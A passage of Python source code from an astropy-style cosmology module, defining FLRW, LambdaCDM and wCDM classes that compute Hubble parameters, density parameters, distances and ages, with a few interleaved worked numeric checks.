[km/sec/Mpc]""" return self._h @property def hubble_time(self): """ Hubble time as astropy.units.Quantity""" return self._hubble_time @property def hubble_distance(self): """ Hubble distance as astropy.units.Quantity""" return self._hubble_distance @property def critical_density0(self): """ Critical density as astropy.units.Quantity at z=0""" return self._critical_density0 @property def Ogamma0(self): """ Omega gamma; the density/critical density of photons at z=0""" return self._Ogamma0 @property def Onu0(self): """ Omega nu; the density/critical density of neutrinos at z=0""" return self._Onu0 @abstractmethod def w(self, z): """ The dark energy equation of state. Parameters ---------- z : array_like Input redshifts. Returns ------- w : ndarray, or float if input scalar The dark energy equation of state Notes ------ The dark energy equation of state is defined as :math:`w(z) = P(z)/\\rho(z)`, where :math:`P(z)` is the pressure at redshift z and :math:`\\rho(z)` is the density at redshift z, both in units where c=1. This must be overridden by subclasses. """ raise NotImplementedError("w(z) is not implemented") def Om(self, z): """ Return the density parameter for non-relativistic matter at redshift `z`. Parameters ---------- z : array_like Input redshifts. Returns ------- Om : ndarray, or float if input scalar The density of non-relativistic matter relative to the critical density at each redshift. """ if isiterable(z): z = np.asarray(z) return self._Om0 * (1. + z) ** 3 * self.inv_efunc(z) ** 2 def Ok(self, z): """ Return the equivalent density parameter for curvature at redshift `z`. Parameters ---------- z : array_like Input redshifts. Returns ------- Ok : ndarray, or float if input scalar The equivalent density parameter for curvature at each redshift. """ if self._Ok0 == 0: # Common enough case to be worth checking return np.zeros_like(z) if isiterable(z): z = np.asarray(z) return self._Ok0 * (1. + z) ** 2 * self.inv_efunc(z) ** 2 def Ode(self, z): """ Return the density parameter for dark energy at redshift `z`. 
Parameters ---------- z : array_like Input redshifts. Returns ------- Ode : ndarray, or float if input scalar The density of non-relativistic matter relative to the critical density at each redshift. """ if self._Ode0 == 0: return np.zeros_like(z) return self._Ode0 * self.de_density_scale(z) * self.inv_efunc(z) ** 2 def Ogamma(self, z): """ Return the density parameter for photons at redshift `z`. Parameters ---------- z : array_like Input redshifts. Returns ------- Ogamma : ndarray, or float if input scalar The energy density of photons relative to the critical density at each redshift. """ if self._Ogamma0 == 0: # Common enough case to be worth checking (although it clearly # doesn't represent any real universe) return np.zeros_like(z) if isiterable(z): z = np.asarray(z) return self._Ogamma0 * (1. + z) ** 4 * self.inv_efunc(z) ** 2 def Onu(self, z): """ Return the density parameter for massless neutrinos at redshift `z`. Parameters ---------- z : array_like Input redshifts. Returns ------- Onu : ndarray, or float if input scalar The energy density of photons relative to the critical density at each redshift. Note that this includes their kinetic energy (if they have mass), so it is not equal to the commonly used :math:`\\sum \\frac{m_{\\nu}}{94 eV}`, which does not include kinetic energy. """ if self._Onu0 == 0: # Common enough case to be worth checking (although it clearly # doesn't represent any real universe) return np.zeros_like(z) if isiterable(z): z = np.asarray(z) return self.Ogamma(z) * self.nu_relative_density(z) def Tcmb(self, z): """ Return the CMB temperature at redshift `z`. Parameters ---------- z : array_like Input redshifts. Returns ------- Tcmb : astropy.units.Quantity The temperature of the CMB in K. """ if isiterable(z): z = np.asarray(z) return self._Tcmb0 * (1.0 + z) def Tnu(self, z): """ Return the neutrino temperature at redshift `z`. Parameters ---------- z : array_like Input redshifts. Returns ------- Tnu : astropy.units.Quantity The temperature of the cosmic neutrino background in K. """ if isiterable(z): z = np.asarray(z) return self._Tnu0 * (1.0 + z) def nu_relative_density(self, z): """ Neutrino density function relative to the energy density in photons. Parameters ---------- z : array like Redshift Returns ------- f : ndarray, or float if z is scalar The neutrino density scaling factor relative to the density in photons at each redshift Notes ----- The density in neutrinos is given by .. math:: \\rho_{\\nu} \\left(a\\right) = 0.2271 \\, N_{eff} \\, f\\left(m_{\\nu} a / T_{\\nu 0} \\right) \\, \\rho_{\\gamma} \\left( a \\right) where .. math:: f \\left(y\\right) = \\frac{120}{7 \\pi^4} \\int_0^{\\infty} \\, dx \\frac{x^2 \\sqrt{x^2 + y^2}} {e^x + 1} assuming that all neutrino species have the same mass. If they have different masses, a similar term is calculated for each one. Note that f has the asymptotic behavior :math:`f(0) = 1`. This method returns :math:`0.2271 f` using an analytical fitting formula given in Komatsu et al. 2011, ApJS 192, 18. """ # See Komatsu et al. 
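# ---------------------------------------------------------------------------
# Illustrative worked example (standalone): Tcmb() above scales the present-day
# CMB temperature as T(z) = Tcmb0 * (1 + z), so with the default Tcmb0 = 2.725 K
# the temperature at recombination (z ~ 1100) comes out near 3000 K:
print(2.725 * (1.0 + 1100.0))    # ~3000 K
# ---------------------------------------------------------------------------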
2011, eq 26 and the surrounding discussion # However, this is modified to handle multiple neutrino masses # by computing the above for each mass, then summing prefac = 0.22710731766 # 7/8 (4/11)^4/3 -- see any cosmo book # The massive and massless contribution must be handled seperately # But check for common cases first if not self._massivenu: return prefac * self._Neff * np.ones_like(z) p = 1.83 invp = 1.0 / 1.83 if np.isscalar(z): curr_nu_y = self._nu_y / (1.0 + z) # only includes massive ones rel_mass_per = (1.0 + (0.3173 * curr_nu_y) ** p) ** invp rel_mass = rel_mass_per.sum() + self._nmasslessnu return prefac * self._neff_per_nu * rel_mass else: z = np.asarray(z) retarr = np.empty_like(z) for i, redshift in enumerate(z): curr_nu_y = self._nu_y / (1.0 + redshift) rel_mass_per = (1.0 + (0.3173 * curr_nu_y) ** p) ** invp rel_mass = rel_mass_per.sum() + self._nmasslessnu retarr[i] = prefac * self._neff_per_nu * rel_mass return retarr def _w_integrand(self, ln1pz): """ Internal convenience function for w(z) integral.""" # See Linder 2003, PRL 90, 91301 eq (5) # Assumes scalar input, since this should only be called # inside an integral z = exp(ln1pz) - 1.0 return 1.0 + self.w(z) def de_density_scale(self, z): """ Evaluates the redshift dependence of the dark energy density. Parameters ---------- z : array_like Input redshifts. Returns ------- I : ndarray, or float if input scalar The scaling of the energy density of dark energy with redshift. Notes ----- The scaling factor, I, is defined by :math:`\\rho(z) = \\rho_0 I`, and is given by .. math:: I = \\exp \\left( 3 \int_{a}^1 \\frac{ da^{\\prime} }{ a^{\\prime} } \\left[ 1 + w\\left( a^{\\prime} \\right) \\right] \\right) It will generally helpful for subclasses to overload this method if the integral can be done analytically for the particular dark energy equation of state that they implement. """ # This allows for an arbitrary w(z) following eq (5) of # Linder 2003, PRL 90, 91301. The code here evaluates # the integral numerically. However, most popular # forms of w(z) are designed to make this integral analytic, # so it is probably a good idea for subclasses to overload this # method if an analytic form is available. # # The integral we actually use (the one given in Linder) # is rewritten in terms of z, so looks slightly different than the # one in the documentation string, but it's the same thing. from scipy.integrate import quad if isiterable(z): z = np.asarray(z) ival = np.array([quad(self._w_integrand, 0, log(1 + redshift))[0] for redshift in z]) return np.exp(3 * ival) else: ival = quad(self._w_integrand, 0, log(1 + z))[0] return exp(3 * ival) def efunc(self, z): """ Function used to calculate H(z), the Hubble parameter. Parameters ---------- z : array_like Input redshifts. Returns ------- E : ndarray, or float if input scalar The redshift scaling of the Hubble constant. Notes ----- The return value, E, is defined such that :math:`H(z) = H_0 E`. It is not necessary to override this method, but if de_density_scale takes a particularly simple form, it may be advantageous to. """ if isiterable(z): z = np.asarray(z) Om0, Ode0, Ok0 = self._Om0, self._Ode0, self._Ok0 if self._massivenu: Or = self._Ogamma0 * (1 + self.nu_relative_density(z)) else: Or = self._Ogamma0 + self._Onu0 zp1 = 1.0 + z return np.sqrt(zp1 ** 2 * ((Or * zp1 + Om0) * zp1 + Ok0) + Ode0 * self.de_density_scale(z)) def inv_efunc(self, z): """Inverse of efunc. Parameters ---------- z : array_like Input redshifts. 
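# ---------------------------------------------------------------------------
# Illustrative sanity check (standalone, assumes scipy): de_density_scale()
# above evaluates I(z) = exp(3 * integral of (1 + w) dln(1+z)) numerically.
# For a constant w the integral is analytic, I = (1+z)**(3*(1+w)), so the
# quadrature can be checked directly:
import numpy as np
from scipy.integrate import quad

w0, z = -0.9, 0.5
ival = quad(lambda ln1pz: 1.0 + w0, 0, np.log(1.0 + z))[0]   # mirrors _w_integrand
print(np.exp(3.0 * ival))                  # ~1.129
print((1.0 + z) ** (3.0 * (1.0 + w0)))     # ~1.129, same value
# ---------------------------------------------------------------------------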
Returns ------- E : ndarray, or float if input scalar The redshift scaling of the inverse Hubble constant. """ # Avoid the function overhead by repeating code if isiterable(z): z = np.asarray(z) Om0, Ode0, Ok0 = self._Om0, self._Ode0, self._Ok0 if self._massivenu: Or = self._Ogamma0 * (1 + self.nu_relative_density(z)) else: Or = self._Ogamma0 + self._Onu0 zp1 = 1.0 + z return 1.0 / np.sqrt(zp1 ** 2 * ((Or * zp1 + Om0) * zp1 + Ok0) + Ode0 * self.de_density_scale(z)) def _tfunc(self, z): """ Integrand of the lookback time. Parameters ---------- z : array_like Input redshifts. Returns ------- I : ndarray, or float if input scalar The integrand for the lookback time References ---------- Eqn 30 from Hogg 1999. """ if isiterable(z): zp1 = 1.0 + np.asarray(z) else: zp1 = 1. + z return 1.0 / (zp1 * self.efunc(z)) def _xfunc(self, z): """ Integrand of the absorption distance. Parameters ---------- z : array_like Input redshifts. Returns ------- X : ndarray, or float if input scalar The integrand for the absorption distance References ---------- See Hogg 1999 section 11. """ if isiterable(z): zp1 = 1.0 + np.asarray(z) else: zp1 = 1. + z return zp1 ** 2 / self.efunc(z) def H(self, z): """ Hubble parameter (km/s/Mpc) at redshift `z`. Parameters ---------- z : array_like Input redshifts. Returns ------- H : astropy.units.Quantity Hubble parameter at each input redshift. """ return self._H0 * self.efunc(z) def scale_factor(self, z): """ Scale factor at redshift `z`. The scale factor is defined as :math:`a = 1 / (1 + z)`. Parameters ---------- z : array_like Input redshifts. Returns ------- a : ndarray, or float if input scalar Scale factor at each input redshift. """ if isiterable(z): z = np.asarray(z) return 1. / (1. + z) def lookback_time(self, z): """ Lookback time in Gyr to redshift `z`. The lookback time is the difference between the age of the Universe now and the age at redshift `z`. Parameters ---------- z : array_like Input redshifts. Returns ------- t : astropy.units.Quantity Lookback time in Gyr to each input redshift. """ from scipy.integrate import quad if not isiterable(z): return self._hubble_time * quad(self._tfunc, 0, z)[0] out = np.array([quad(self._tfunc, 0, redshift)[0] for redshift in z]) return self._hubble_time * np.array(out) def age(self, z): """ Age of the universe in Gyr at redshift `z`. Parameters ---------- z : array_like Input redshifts. Returns ------- t : astropy.units.Quantity The age of the universe in Gyr at each input redshift. """ from scipy.integrate import quad if not isiterable(z): return self._hubble_time * quad(self._tfunc, z, np.inf)[0] out = [quad(self._tfunc, redshift, np.inf)[0] for redshift in z] return self._hubble_time * np.array(out) def critical_density(self, z): """ Critical density in grams per cubic cm at redshift `z`. Parameters ---------- z : array_like Input redshifts. Returns ------- rho : astropy.units.Quantity Critical density in g/cm^3 at each input redshift. """ return self._critical_density0 * (self.efunc(z)) ** 2 def comoving_distance(self, z): """ Comoving line-of-sight distance in Mpc at a given redshift. The comoving distance along the line-of-sight between two objects remains constant with time for objects in the Hubble flow. Parameters ---------- z : array_like Input redshifts. Returns ------- d : ndarray, or float if input scalar Comoving distance in Mpc to each input redshift. 
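# ---------------------------------------------------------------------------
# Illustrative check (standalone, assumes scipy): age() above integrates
# 1 / ((1+z) * E(z)) from z to infinity in units of the Hubble time.  In the
# flat, matter-only (Einstein-de Sitter) limit E(z) = (1+z)**1.5 and the
# integral reproduces the textbook age t0 = 2/3 of a Hubble time:
from scipy.integrate import quad
print(quad(lambda z: (1.0 + z) ** -2.5, 0, float('inf'))[0])   # ~0.6667
# ---------------------------------------------------------------------------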
""" from scipy.integrate import quad if not isiterable(z): return self._hubble_distance * quad(self.inv_efunc, 0, z)[0] out = [quad(self.inv_efunc, 0, redshift)[0] for redshift in z] return self._hubble_distance * np.array(out) def comoving_transverse_distance(self, z): """ Comoving transverse distance in Mpc at a given redshift. This value is the transverse comoving distance at redshift `z` corresponding to an angular separation of 1 radian. This is the same as the comoving distance if omega_k is zero (as in the current concordance lambda CDM model). Parameters ---------- z : array_like Input redshifts. Returns ------- d : astropy.units.Quantity Comoving transverse distance in Mpc at each input redshift. Notes ----- This quantity also called the 'proper motion distance' in some texts. """ Ok0 = self._Ok0 dc = self.comoving_distance(z) if Ok0 == 0: return dc sqrtOk0 = sqrt(abs(Ok0)) dh = self._hubble_distance if Ok0 > 0: return dh / sqrtOk0 * np.sinh(sqrtOk0 * dc.value / dh.value) else: return dh / sqrtOk0 * np.sin(sqrtOk0 * dc.value / dh.value) def angular_diameter_distance(self, z): """ Angular diameter distance in Mpc at a given redshift. This gives the proper (sometimes called 'physical') transverse distance corresponding to an angle of 1 radian for an object at redshift `z`. Weinberg, 1972, pp 421-424; Weedman, 1986, pp 65-67; Peebles, 1993, pp 325-327. Parameters ---------- z : array_like Input redshifts. Returns ------- d : astropy.units.Quantity Angular diameter distance in Mpc at each input redshift. """ if isiterable(z): z = np.asarray(z) return self.comoving_transverse_distance(z) / (1. + z) def luminosity_distance(self, z): """ Luminosity distance in Mpc at redshift `z`. This is the distance to use when converting between the bolometric flux from an object at redshift `z` and its bolometric luminosity. Parameters ---------- z : array_like Input redshifts. Returns ------- d : astropy.units.Quantity Luminosity distance in Mpc at each input redshift. References ---------- Weinberg, 1972, pp 420-424; Weedman, 1986, pp 60-62. """ if isiterable(z): z = np.asarray(z) return (1. + z) * self.comoving_transverse_distance(z) def angular_diameter_distance_z1z2(self, z1, z2): """ Angular diameter distance between objects at 2 redshifts. Useful for gravitational lensing. Parameters ---------- z1, z2 : array_like, shape (N,) Input redshifts. z2 must be large than z1. Returns ------- d : astropy.units.Quantity, shape (N,) or single if input scalar The angular diameter distance between each input redshift pair. Raises ------ CosmologyError If omega_k is < 0. Notes ----- This method only works for flat or open curvature (omega_k >= 0). """ # does not work for negative curvature Ok0 = self._Ok0 if Ok0 < 0: raise CosmologyError('Ok0 must be >= 0 to use this method.') outscalar = False if not isiterable(z1) and not isiterable(z2): outscalar = True z1 = np.atleast_1d(z1) z2 = np.atleast_1d(z2) if z1.size != z2.size: raise ValueError('z1 and z2 must be the same size.') if (z1 > z2).any(): raise ValueError('z2 must greater than z1') # z1 < z2 if (z2 < z1).any(): z1, z2 = z2, z1 dm1 = self.comoving_transverse_distance(z1).value dm2 = self.comoving_transverse_distance(z2).value dh_2 = self._hubble_distance.value ** 2 if Ok0 == 0: # Common case worth checking out = (dm2 - dm1) / (1. + z2) else: out = ((dm2 * np.sqrt(1. + Ok0 * dm1 ** 2 / dh_2) - dm1 * np.sqrt(1. + Ok0 * dm2 ** 2 / dh_2)) / (1. 
+ z2)) if outscalar: return u.Quantity(out[0], u.Mpc) return u.Quantity(out, u.Mpc) def absorption_distance(self, z): """ Absorption distance at redshift `z`. This is used to calculate the number of objects with some cross section of absorption and number density intersecting a sightline per unit redshift path. Parameters ---------- z : array_like Input redshifts. Returns ------- d : float or ndarray Absorption distance (dimensionless) at each input redshift. References ---------- Hogg 1999 Section 11. (astro-ph/9905116) Bahcall, . and . 1969, ApJ, 156L, 7B """ from scipy.integrate import quad if not isiterable(z): return quad(self._xfunc, 0, z)[0] out = np.array([quad(self._xfunc, 0, redshift)[0] for redshift in z]) return out def distmod(self, z): """ Distance modulus at redshift `z`. The distance modulus is defined as the (apparent magnitude - absolute magnitude) for an object at redshift `z`. Parameters ---------- z : array_like Input redshifts. Returns ------- distmod : astropy.units.Quantity Distance modulus at each input redshift, in magnitudes """ # Remember that the luminosity distance is in Mpc val = 5. * np.log10(self.luminosity_distance(z).value * 1.e5) return u.Quantity(val, u.mag) def comoving_volume(self, z): """ Comoving volume in cubic Mpc at redshift `z`. This is the volume of the universe encompassed by redshifts less than `z`. For the case of omega_k = 0 it is a sphere of radius `comoving_distance(z)` but it is less intuitive if omega_k is not 0. Parameters ---------- z : array_like Input redshifts. Returns ------- V : astropy.units.Quantity Comoving volume in :math:`Mpc^3` at each input redshift. """ Ok0 = self._Ok0 if Ok0 == 0: return 4. / 3. * pi * self.comoving_distance(z) ** 3 dh = self._hubble_distance.value # .value for speed dm = self.comoving_transverse_distance(z).value term1 = 4. * pi * dh ** 3 / (2. * Ok0) * u.Mpc ** 3 term2 = dm / dh * np.sqrt(1 + Ok0 * (dm / dh) ** 2) term3 = sqrt(abs(Ok0)) * dm / dh if Ok0 > 0: return term1 * (term2 - 1. / sqrt(abs(Ok0)) * np.arcsinh(term3)) else: return term1 * (term2 - 1. / sqrt(abs(Ok0)) * np.arcsin(term3)) def kpc_comoving_per_arcmin(self, z): """ Separation in transverse comoving kpc corresponding to an arcminute at redshift `z`. Parameters ---------- z : array_like Input redshifts. Returns ------- d : astropy.units.Quantity The distance in comoving kpc corresponding to an arcmin at each input redshift. """ return (self.comoving_transverse_distance(z).to(u.kpc) * arcmin_in_radians / u.arcmin) def kpc_proper_per_arcmin(self, z): """ Separation in transverse proper kpc corresponding to an arcminute at redshift `z`. Parameters ---------- z : array_like Input redshifts. Returns ------- d : astropy.units.Quantity The distance in proper kpc corresponding to an arcmin at each input redshift. """ return (self.angular_diameter_distance(z).to(u.kpc) * arcmin_in_radians / u.arcmin) def arcsec_per_kpc_comoving(self, z): """ Angular separation in arcsec corresponding to a comoving kpc at redshift `z`. Parameters ---------- z : array_like Input redshifts. Returns ------- theta : astropy.units.Quantity The angular separation in arcsec corresponding to a comoving kpc at each input redshift. """ return u.arcsec / (self.comoving_transverse_distance(z).to(u.kpc) * arcsec_in_radians) def arcsec_per_kpc_proper(self, z): """ Angular separation in arcsec corresponding to a proper kpc at redshift `z`. Parameters ---------- z : array_like Input redshifts. 
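# ---------------------------------------------------------------------------
# Illustrative worked example (standalone): distmod() above converts a
# luminosity distance in Mpc to a distance modulus via
# mu = 5*log10(d_L / 10 pc) = 5*log10(d_L[Mpc] * 1e5).  For a hypothetical
# d_L = 1000 Mpc:
import numpy as np
print(5.0 * np.log10(1000.0 * 1.0e5))    # 40.0 mag
# ---------------------------------------------------------------------------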
Returns ------- theta : astropy.units.Quantity The angular separation in arcsec corresponding to a proper kpc at each input redshift. """ return u.arcsec / (self.angular_diameter_distance(z).to(u.kpc) * arcsec_in_radians) class LambdaCDM(FLRW): """FLRW cosmology with a cosmological constant and curvature. This has no additional attributes beyond those of FLRW. Parameters ---------- H0 : float or astropy.units.Quantity Hubble constant at z = 0. If a float, must be in [km/sec/Mpc] Om0 : float Omega matter: density of non-relativistic matter in units of the critical density at z=0. Ode0 : float Omega dark energy: density of the cosmological constant in units of the critical density at z=0. Tcmb0 : float or astropy.units.Quantity Temperature of the CMB z=0. If a float, must be in [K]. Default: 2.725. Neff : float Effective number of Neutrino species. Default 3.04. m_nu : astropy.units.Quantity Mass of each neutrino species. If this is a scalar Quantity, then all neutrino species are assumed to have that mass. Otherwise, the mass of each species. The actual number of neutrino species (and hence the number of elements of m_nu if it is not scalar) must be the floor of Neff. Usually this means you must provide three neutrino masses unless you are considering something like a sterile neutrino. name : str Optional name for this cosmological object. Examples -------- >>> from astropy.cosmology import LambdaCDM >>> cosmo = LambdaCDM(H0=70, Om0=0.3, Ode0=0.7) The comoving distance in Mpc at redshift z: >>> z = 0.5 >>> dc = cosmo.comoving_distance(z) """ def __init__(self, H0, Om0, Ode0, Tcmb0=2.725, Neff=3.04, m_nu=u.Quantity(0.0, u.eV), name=None): FLRW.__init__(self, H0, Om0, Ode0, Tcmb0, Neff, m_nu, name=name) def w(self, z): """Returns dark energy equation of state at redshift `z`. Parameters ---------- z : array_like Input redshifts. Returns ------- w : ndarray, or float if input scalar The dark energy equation of state Notes ------ The dark energy equation of state is defined as :math:`w(z) = P(z)/\\rho(z)`, where :math:`P(z)` is the pressure at redshift z and :math:`\\rho(z)` is the density at redshift z, both in units where c=1. Here this is :math:`w(z) = -1`. """ return -1.0 * np.ones_like(z) def de_density_scale(self, z): """ Evaluates the redshift dependence of the dark energy density. Parameters ---------- z : array_like Input redshifts. Returns ------- I : ndarray, or float if input scalar The scaling of the energy density of dark energy with redshift. Notes ----- The scaling factor, I, is defined by :math:`\\rho(z) = \\rho_0 I`, and in this case is given by :math:`I = 1`. """ return np.ones_like(z) def efunc(self, z): """ Function used to calculate H(z), the Hubble parameter. Parameters ---------- z : array_like Input redshifts. Returns ------- E : ndarray, or float if input scalar The redshift scaling of the Hubble consant. Notes ----- The return value, E, is defined such that :math:`H(z) = H_0 E`. """ if isiterable(z): z = np.asarray(z) # We override this because it takes a particularly simple # form for a cosmological constant Om0, Ode0, Ok0 = self._Om0, self._Ode0, self._Ok0 if self._massivenu: Or = self._Ogamma0 * (1 + self.nu_relative_density(z)) else: Or = self._Ogamma0 + self._Onu0 zp1 = 1.0 + z return np.sqrt(zp1 ** 2 * ((Or * zp1 + Om0) * zp1 + Ok0) + Ode0) def inv_efunc(self, z): r""" Function used to calculate :math:`\frac{1}{H_z}`. Parameters ---------- z : array_like Input redshifts. 
Returns ------- E : ndarray, or float if input scalar The inverse redshift scaling of the Hubble constant. Notes ----- The return value, E, is defined such that :math:`H_z = H_0 / E`. """ if isiterable(z): z = np.asarray(z) Om0, Ode0, Ok0 = self._Om0, self._Ode0, self._Ok0 if self._massivenu: Or = self._Ogamma0 * (1 + self.nu_relative_density(z)) else: Or = self._Ogamma0 + self._Onu0 zp1 = 1.0 + z return 1.0 / np.sqrt(zp1 ** 2 * ((Or * zp1 + Om0) * zp1 + Ok0) + Ode0) class FlatLambdaCDM(LambdaCDM): """FLRW cosmology with a cosmological constant and no curvature. This has no additional attributes beyond those of FLRW. Parameters ---------- H0 : float or astropy.units.Quantity Hubble constant at z = 0. If a float, must be in [km/sec/Mpc] Om0 : float Omega matter: density of non-relativistic matter in units of the critical density at z=0. Tcmb0 : float or astropy.units.Quantity Temperature of the CMB z=0. If a float, must be in [K]. Default: 2.725. Neff : float Effective number of Neutrino species. Default 3.04. m_nu : astropy.units.Quantity Mass of each neutrino species. If this is a scalar Quantity, then all neutrino species are assumed to have that mass. Otherwise, the mass of each species. The actual number of neutrino species (and hence the number of elements of m_nu if it is not scalar) must be the floor of Neff. Usually this means you must provide three neutrino masses unless you are considering something like a sterile neutrino. name : str Optional name for this cosmological object. Examples -------- >>> from astropy.cosmology import FlatLambdaCDM >>> cosmo = FlatLambdaCDM(H0=70, Om0=0.3) The comoving distance in Mpc at redshift z: >>> z = 0.5 >>> dc = cosmo.comoving_distance(z) """ def __init__(self, H0, Om0, Tcmb0=2.725, Neff=3.04, m_nu=u.Quantity(0.0, u.eV), name=None): FLRW.__init__(self, H0, Om0, 0.0, Tcmb0, Neff, m_nu, name=name) # Do some twiddling after the fact to get flatness self._Ode0 = 1.0 - self._Om0 - self._Ogamma0 - self._Onu0 self._Ok0 = 0.0 def efunc(self, z): """ Function used to calculate H(z), the Hubble parameter. Parameters ---------- z : array_like Input redshifts. Returns ------- E : ndarray, or float if input scalar The redshift scaling of the Hubble consant. Notes ----- The return value, E, is defined such that :math:`H(z) = H_0 E`. """ if isiterable(z): z = np.asarray(z) # We override this because it takes a particularly simple # form for a cosmological constant Om0, Ode0 = self._Om0, self._Ode0 if self._massivenu: Or = self._Ogamma0 * (1 + self.nu_relative_density(z)) else: Or = self._Ogamma0 + self._Onu0 zp1 = 1.0 + z return np.sqrt(zp1 ** 3 * (Or * zp1 + Om0) + Ode0) def inv_efunc(self, z): r"""Function used to calculate :math:`\frac{1}{H_z}`. Parameters ---------- z : array_like Input redshifts. Returns ------- E : ndarray, or float if input scalar The inverse redshift scaling of the Hubble constant. Notes ----- The return value, E, is defined such that :math:`H_z = H_0 / E`. """ if isiterable(z): z = np.asarray(z) Om0, Ode0 = self._Om0, self._Ode0 if self._massivenu: Or = self._Ogamma0 * (1 + self.nu_relative_density(z)) else: Or = self._Ogamma0 + self._Onu0 zp1 = 1.0 + z return 1.0 / np.sqrt(zp1 ** 3 * (Or * zp1 + Om0) + Ode0) def __repr__(self): retstr = "{0:s}H0={1:.3g}, Om0={2:.3g}, Tcmb0={3:.4g}, "\ "Neff={4:.3g}, m_nu={5:s})" return retstr.format(self._namelead(), self._H0, self._Om0, self._Tcmb0, self._Neff, self.m_nu) class wCDM(FLRW): """FLRW cosmology with a constant dark energy equation of state and curvature. 
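# ---------------------------------------------------------------------------
# Illustrative check (standalone): for FlatLambdaCDM the efunc() above reduces
# to E(z) = sqrt(Om0*(1+z)**3 + Ode0) once the small photon and neutrino terms
# are neglected.  With Om0 = 0.3, Ode0 = 0.7 at z = 1:
import numpy as np
print(np.sqrt(0.3 * 2.0 ** 3 + 0.7))    # ~1.761, i.e. H(z=1) ~ 1.76 * H0
# ---------------------------------------------------------------------------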
This has one additional attribute beyond those of FLRW. Parameters ---------- H0 : float or astropy.units.Quantity Hubble constant at z = 0. If a float, must be in [km/sec/Mpc] Om0 : float Omega matter: density of non-relativistic matter in units of the critical density at z=0. Ode0 : float Omega dark energy: density of dark energy in units of the critical density at z=0. w0 : float Dark energy equation of state at all redshifts. This is pressure/density for dark energy in units where c=1. A cosmological constant has w0=-1.0. Tcmb0 : float or astropy.units.Quantity Temperature of the CMB z=0. If a float, must be in [K]. Default: 2.725. Neff : float Effective number of Neutrino species. Default 3.04. m_nu : astropy.units.Quantity Mass of each neutrino species. If this is a scalar Quantity, then all neutrino species are assumed to have that mass. Otherwise, the mass of each species. The actual number of neutrino species (and hence the number of elements of m_nu if it is not scalar) must be the floor of Neff. Usually this means you must provide three neutrino masses unless you are considering something like a sterile neutrino. name : str Optional name for this cosmological object. Examples -------- >>> from astropy.cosmology import wCDM >>> cosmo = wCDM(H0=70, Om0=0.3, Ode0=0.7, w0=-0.9) The comoving distance in Mpc at redshift z: >>> z = 0.5 >>> dc = cosmo.comoving_distance(z) """ def __init__(self, H0, Om0, Ode0, w0=-1., Tcmb0=2.725, Neff=3.04, m_nu=u.Quantity(0.0, u.eV), name=None): FLRW.__init__(self, H0, Om0, Ode0, Tcmb0, Neff, m_nu, name=name) self._w0 = float(w0) @property def w0(self): """ Dark energy equation of state""" return self._w0 def w(self, z): """Returns dark energy equation of state at redshift `z`. Parameters ---------- z : array_like Input redshifts. Returns ------- w : ndarray, or float if input scalar The dark energy equation of state Notes ------ The dark energy equation of state is defined as :math:`w(z) = P(z)/\\rho(z)`, where :math:`P(z)` is the pressure at redshift z and :math:`\\rho(z)` is the density at redshift z, both in units where c=1. Here this is :math:`w(z) = w_0`. """ return self._w0 * np.ones_like(z) def de_density_scale(self, z): """ Evaluates the redshift dependence of the dark energy density. Parameters ---------- z : array_like Input redshifts. Returns ------- I : ndarray, or float if input scalar The scaling of the energy density of dark energy with redshift. Notes ----- The scaling factor, I, is defined by :math:`\\rho(z) = \\rho_0 I`, and in this case is given by :math:`I = \\left(1 + z\\right)^{3\\left(1 + w_0\\right)}` """ if isiterable(z): z = np.asarray(z) return (1.0 + z) ** (3 * (1 + self._w0)) def efunc(self, z): """ Function used to calculate H(z), the Hubble parameter. Parameters ---------- z : array_like Input redshifts. Returns ------- E : ndarray, or float if input scalar The redshift scaling of the Hubble consant. Notes ----- The return value, E, is defined such that :math:`H(z) = H_0 E`. """ if isiterable(z): z = np.asarray(z) Om0, Ode0, Ok0, w0 = self._Om0, self._Ode0, self._Ok0, self._w0 if self._massivenu: Or = self._Ogamma0 * (1 + self.nu_relative_density(z)) else: Or = self._Ogamma0 + self._Onu0 zp1 = 1.0 + z return np.sqrt(zp1 ** 2 * ((Or * zp1 + Om0) * zp1 + Ok0) + Ode0 * zp1 ** (3.0 * (1 + w0))) def inv_efunc(self, z): r""" Function used to calculate :math:`\frac{1}{H_z}`. Parameters ---------- z : array_like Input redshifts. 
Returns ------- E : ndarray, or float if input scalar The inverse redshift scaling of the Hubble constant. Notes ----- The return value, E, is defined such that :math:`H_z = H_0 / E`. """ if isiterable(z): z = np.asarray(z) Om0, Ode0, Ok0, w0 = self._Om0, self._Ode0, self._Ok0, self._w0 if self._massivenu: Or = self._Ogamma0 * (1 + self.nu_relative_density(z)) else: Or = self._Ogamma0 + self._Onu0 zp1 = 1.0 + z return 1.0 / np.sqrt(zp1 ** 2 * ((Or * zp1 + Om0) * zp1 + Ok0) + Ode0 * zp1 ** (3 * (1 + w0))) def __repr__(self): retstr = "{0:s}H0={1:.3g}, Om0={2:.3g}, Ode0={3:.3g}, w0={4:.3g}, "\ "Tcmb0={5:.4g}, Neff={6:.3g}, m_nu={7:s})" return retstr.format(self._namelead(), self._H0, self._Om0, self._Ode0, self._w0, self._Tcmb0, self._Neff, self.m_nu) class FlatwCDM(wCDM): """FLRW cosmology with a constant dark energy equation of state and no spatial curvature. This has one additional attribute beyond those of FLRW. Parameters ---------- H0 : float or astropy.units.Quantity Hubble constant at z = 0. If a float, must be in [km/sec/Mpc] Om0 : float Omega matter: density of non-relativistic matter in units of the critical density at z=0. w0 : float Dark energy equation of state at all redshifts. This is pressure/density for dark energy in units where c=1. A cosmological constant has w0=-1.0. Tcmb0 : float or astropy.units.Quantity Temperature of the CMB z=0. If a float, must be in [K]. Default: 2.725. Neff : float Effective number of Neutrino species. Default 3.04. m_nu : astropy.units.Quantity Mass of each neutrino species. If this is a scalar Quantity, then all neutrino species are assumed to have that mass. Otherwise, the mass of each species. The actual number of neutrino species (and hence the number of elements of m_nu if it is not scalar) must be the floor of Neff. Usually this means you must provide three neutrino masses unless you are considering something like a sterile neutrino. name : str Optional name for this cosmological object. Examples -------- >>> from astropy.cosmology import FlatwCDM >>> cosmo = FlatwCDM(H0=70, Om0=0.3, w0=-0.9) The comoving distance in Mpc at redshift z: >>> z = 0.5 >>> dc = cosmo.comoving_distance(z) """ def __init__(self, H0, Om0, w0=-1., Tcmb0=2.725, Neff=3.04, m_nu=u.Quantity(0.0, u.eV), name=None): FLRW.__init__(self, H0, Om0, 0.0, Tcmb0, Neff, m_nu, name=name) self._w0 = float(w0) # Do some twiddling after the fact to get flatness self._Ode0 = 1.0 - self._Om0 - self._Ogamma0 - self._Onu0 self._Ok0 = 0.0 def efunc(self, z): """ Function used to calculate H(z), the Hubble parameter. Parameters ---------- z : array_like Input 